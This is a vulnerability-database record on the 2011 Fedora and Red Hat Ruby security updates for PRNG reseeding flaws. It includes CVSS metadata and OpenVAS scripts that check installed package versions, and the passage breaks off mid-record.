DATABASE RESOURCES PRICING ABOUT US

{"id": "FEDORA:A32861106C6", "vendorId": null, "type": "fedora", "bulletinFamily": "unix", "title": "[SECURITY] Fedora 15 Update: ruby-1.8.7.352-1.fc15", "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "published": "2011-07-26T03:44:33", "modified": "2011-07-26T03:44:33", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KWZJCSOUJYHVQHYDJAFP2EGN4IUYY3JZ/", "reporter": "Fedora", "references": [], "cvelist": ["CVE-2011-2686", "CVE-2011-2705"], "immutableFields": [], "lastseen": "2020-12-21T08:17:50", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-2686", "CVE-2011-2705"]}, {"type": "debian", "idList": ["DEBIAN:DLA-235-1:FDEBD", "DEBIAN:DLA-88-1:4DC9E", "DEBIAN:DLA-88-1:B6B6B"]}, {"type": "fedora", "idList": ["FEDORA:355AE1106CB", "FEDORA:BFF2C21133"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-235.NASL", "DEBIAN_DLA-88.NASL", "FEDORA_2011-9359.NASL", "FEDORA_2011-9374.NASL", "REDHAT-RHSA-2011-1581.NASL", "SL_20111206_RUBY_ON_SL6_X.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "SUSE_11_4_RUBY-120117.NASL", "SUSE_11_RUBY-187P357-120126.NASL", "SUSE_11_RUBY-187P357-120127.NASL", "SUSE_RUBY-8524.NASL", "UBUNTU_USN-1377-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122037", "OPENVAS:1361412562310840923", "OPENVAS:1361412562310863371", "OPENVAS:1361412562310863380", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310870534", "OPENVAS:1361412562310870640", "OPENVAS:1361412562310881137", "OPENVAS:1361412562310881191", "OPENVAS:1361412562310902558", "OPENVAS:1361412562310902560", "OPENVAS:840923", "OPENVAS:863371", "OPENVAS:863380", "OPENVAS:863681", "OPENVAS:870534", "OPENVAS:870640", "OPENVAS:881137", "OPENVAS:881191", "OPENVAS:902558", "OPENVAS:902560"]}, {"type": "oraclelinux", "idList": ["ELSA-2011-1581"]}, {"type": "redhat", "idList": ["RHSA-2011:1581"]}, {"type": "seebug", "idList": ["SSV:20813"]}, {"type": "ubuntu", "idList": ["USN-1377-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-2686", "UB:CVE-2011-2705"]}], "rev": 4}, "score": {"value": 4.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2011-2686", "CVE-2011-2705"]}, {"type": "debian", "idList": ["DEBIAN:DLA-88-1:4DC9E"]}, {"type": "fedora", "idList": ["FEDORA:BFF2C21133"]}, {"type": "nessus", "idList": ["SL_20111206_RUBY_ON_SL6_X.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310881191"]}, {"type": "oraclelinux", "idList": ["ELSA-2011-1581"]}, {"type": "redhat", "idList": ["RHSA-2011:1581"]}, {"type": "seebug", "idList": ["SSV:20813"]}, {"type": "ubuntu", "idList": ["USN-1377-1"]}]}, "exploitation": null, "vulnersScore": 4.9}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "affectedPackage": [{"OS": "Fedora", "OSVersion": "15", "arch": "any", "packageName": "ruby", "packageVersion": "1.8.7.352", "packageFilename": "UNKNOWN", "operator": "lt"}]}

{"fedora": [{"lastseen": "2020-12-21T08:17:50", "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "cvss3": {}, "published": "2011-07-26T03:41:33", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: ruby-1.8.7.352-1.fc14", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2686", "CVE-2011-2705"], "modified": "2011-07-26T03:41:33", "id": "FEDORA:355AE1106CB", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/VCRPMSDY5P57IRO5EQG3RPSE35DRI3Z5/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:50", "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "cvss3": {}, "published": "2012-01-11T06:14:53", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: ruby-1.8.7.357-1.fc15", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2686", "CVE-2011-4815"], "modified": "2012-01-11T06:14:53", "id": "FEDORA:BFF2C21133", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/MHKLLLEGFGATC2GAS4AWHNYFFD5XAZQ6/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:40:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-07-27T00:00:00", "type": "openvas", "title": "Fedora Update for ruby FEDORA-2011-9374", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2705", "CVE-2011-2686"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863380", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863380", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ruby FEDORA-2011-9374\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-July/063062.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863380\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 14:47:11 +0200 (Wed, 27 Jul 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-9374\");\n script_cve_id(\"CVE-2011-2686\", \"CVE-2011-2705\");\n script_name(\"Fedora Update for ruby FEDORA-2011-9374\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"ruby on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.7.352~1.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-25T10:55:32", "description": "Check for the Version of ruby", "cvss3": {}, "published": "2011-07-27T00:00:00", "type": "openvas", "title": "Fedora Update for ruby FEDORA-2011-9359", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2705", "CVE-2011-2686"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863371", "href": "http://plugins.openvas.org/nasl.php?oid=863371", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ruby FEDORA-2011-9359\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"ruby on Fedora 15\";\ntag_insight = \"Ruby is the interpreted scripting language for quick and easy\n object-oriented programming. It has many features to process text\n files and to do system management tasks (as in Perl). It is simple,\n straight-forward, and extensible.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-July/063071.html\");\n script_id(863371);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 14:47:11 +0200 (Wed, 27 Jul 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-9359\");\n script_cve_id(\"CVE-2011-2686\", \"CVE-2011-2705\");\n script_name(\"Fedora Update for ruby FEDORA-2011-9359\");\n\n script_summary(\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.7.352~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:55:52", "description": "Check for the Version of ruby", "cvss3": {}, "published": "2011-07-27T00:00:00", "type": "openvas", "title": "Fedora Update for ruby FEDORA-2011-9374", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2705", "CVE-2011-2686"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863380", "href": "http://plugins.openvas.org/nasl.php?oid=863380", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ruby FEDORA-2011-9374\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"ruby on Fedora 14\";\ntag_insight = \"Ruby is the interpreted scripting language for quick and easy\n object-oriented programming. It has many features to process text\n files and to do system management tasks (as in Perl). It is simple,\n straight-forward, and extensible.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-July/063062.html\");\n script_id(863380);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 14:47:11 +0200 (Wed, 27 Jul 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-9374\");\n script_cve_id(\"CVE-2011-2686\", \"CVE-2011-2705\");\n script_name(\"Fedora Update for ruby FEDORA-2011-9374\");\n\n script_summary(\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.7.352~1.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:40:01", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-07-27T00:00:00", "type": "openvas", "title": "Fedora Update for ruby FEDORA-2011-9359", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2705", "CVE-2011-2686"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863371", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863371", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ruby FEDORA-2011-9359\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-July/063071.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863371\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 14:47:11 +0200 (Wed, 27 Jul 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-9359\");\n script_cve_id(\"CVE-2011-2686\", \"CVE-2011-2705\");\n script_name(\"Fedora Update for ruby FEDORA-2011-9359\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"ruby on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.7.352~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-09T00:00:00", "type": "openvas", "title": "RedHat Update for ruby RHSA-2011:1581-03", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2705", "CVE-2011-2686", "CVE-2011-3009"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870640", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2011:1581-03\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2011-December/msg00012.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870640\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:38:32 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2011-2705\", \"CVE-2011-3009\", \"CVE-2011-2686\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"RHSA\", value:\"2011:1581-03\");\n script_name(\"RedHat Update for ruby RHSA-2011:1581-03\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"ruby on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Ruby is an extensible, interpreted, object-oriented, scripting language. It\n has features to process text files and to do system management tasks.\n\n It was found that Ruby did not reinitialize the PRNG (pseudorandom number\n generator) after forking a child process. This could eventually lead to the\n PRNG returning the same result twice. An attacker keeping track of the\n values returned by one child process could use this flaw to predict the\n values the PRNG would return in other child processes (as long as the\n parent process persisted). (CVE-2011-3009)\n\n A flaw was found in the Ruby SecureRandom module. When using the\n SecureRandom.random_bytes class, the PRNG state was not modified after\n forking a child process. This could eventually lead to\n SecureRandom.random_bytes returning the same string more than once. An\n attacker keeping track of the strings returned by one child process could\n use this flaw to predict the strings SecureRandom.random_bytes would return\n in other child processes (as long as the parent process persisted).\n (CVE-2011-2705)\n\n This update also fixes the following bugs:\n\n * The ruby package has been upgraded to upstream point release 1.8.7-p352,\n which provides a number of bug fixes over the previous version. (BZ#706332)\n\n * The MD5 message-digest algorithm is not a FIPS-approved algorithm.\n Consequently, when a Ruby script attempted to calculate an MD5 checksum in\n FIPS mode, the interpreter terminated unexpectedly. This bug has been fixed\n and an exception is now raised in the described scenario. (BZ#717709)\n\n * Due to inappropriately handled line continuations in the mkconfig.rb\n source file, an attempt to build the ruby package resulted in unexpected\n termination. An upstream patch has been applied to address this issue and\n the ruby package can now be built properly. (BZ#730287)\n\n * When the 32-bit ruby-libs library was installed on a 64-bit machine, the\n mkmf library failed to load various modules necessary for building\n Ruby-related packages. This bug has been fixed and mkmf now works properly\n in the described scenario. (BZ#674787)\n\n * Previously, the load paths for scripts and binary modules were duplicated\n on the i386 architecture. Consequently, an ActiveSupport test failed. With\n this update, the load paths are no longer stored in duplicates on the i386\n architecture. (BZ#722887)\n\n This update also adds the following enhancement:\n\n * With this update, SystemTap probes have been added to the ruby package.\n (BZ#673162)\n\n All users of ruby are advised to upgrade to these updated packages, which\n resolve these issues and add this enhancement.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.7.352~3.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.7.352~3.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.7.352~3.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.7.352~3.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-02T10:57:55", "description": "Check for the Version of ruby", "cvss3": {}, "published": "2012-07-09T00:00:00", "type": "openvas", "title": "RedHat Update for ruby RHSA-2011:1581-03", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2705", "CVE-2011-2686", "CVE-2011-3009"], "modified": "2017-12-29T00:00:00", "id": "OPENVAS:870640", "href": "http://plugins.openvas.org/nasl.php?oid=870640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2011:1581-03\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an extensible, interpreted, object-oriented, scripting language. It\n has features to process text files and to do system management tasks.\n\n It was found that Ruby did not reinitialize the PRNG (pseudorandom number\n generator) after forking a child process. This could eventually lead to the\n PRNG returning the same result twice. An attacker keeping track of the\n values returned by one child process could use this flaw to predict the\n values the PRNG would return in other child processes (as long as the\n parent process persisted). (CVE-2011-3009)\n\n A flaw was found in the Ruby SecureRandom module. When using the\n SecureRandom.random_bytes class, the PRNG state was not modified after\n forking a child process. This could eventually lead to\n SecureRandom.random_bytes returning the same string more than once. An\n attacker keeping track of the strings returned by one child process could\n use this flaw to predict the strings SecureRandom.random_bytes would return\n in other child processes (as long as the parent process persisted).\n (CVE-2011-2705)\n\n This update also fixes the following bugs:\n\n * The ruby package has been upgraded to upstream point release 1.8.7-p352,\n which provides a number of bug fixes over the previous version. (BZ#706332)\n\n * The MD5 message-digest algorithm is not a FIPS-approved algorithm.\n Consequently, when a Ruby script attempted to calculate an MD5 checksum in\n FIPS mode, the interpreter terminated unexpectedly. This bug has been fixed\n and an exception is now raised in the described scenario. (BZ#717709)\n\n * Due to inappropriately handled line continuations in the mkconfig.rb\n source file, an attempt to build the ruby package resulted in unexpected\n termination. An upstream patch has been applied to address this issue and\n the ruby package can now be built properly. (BZ#730287)\n\n * When the 32-bit ruby-libs library was installed on a 64-bit machine, the\n mkmf library failed to load various modules necessary for building\n Ruby-related packages. This bug has been fixed and mkmf now works properly\n in the described scenario. (BZ#674787)\n\n * Previously, the load paths for scripts and binary modules were duplicated\n on the i386 architecture. Consequently, an ActiveSupport test failed. With\n this update, the load paths are no longer stored in duplicates on the i386\n architecture. (BZ#722887)\n\n This update also adds the following enhancement:\n\n * With this update, SystemTap probes have been added to the ruby package.\n (BZ#673162)\n\n All users of ruby are advised to upgrade to these updated packages, which\n resolve these issues and add this enhancement.\";\n\ntag_affected = \"ruby on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-December/msg00012.html\");\n script_id(870640);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:38:32 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2011-2705\", \"CVE-2011-3009\", \"CVE-2011-2686\");\n script_tag(name:\"cvss_base\", 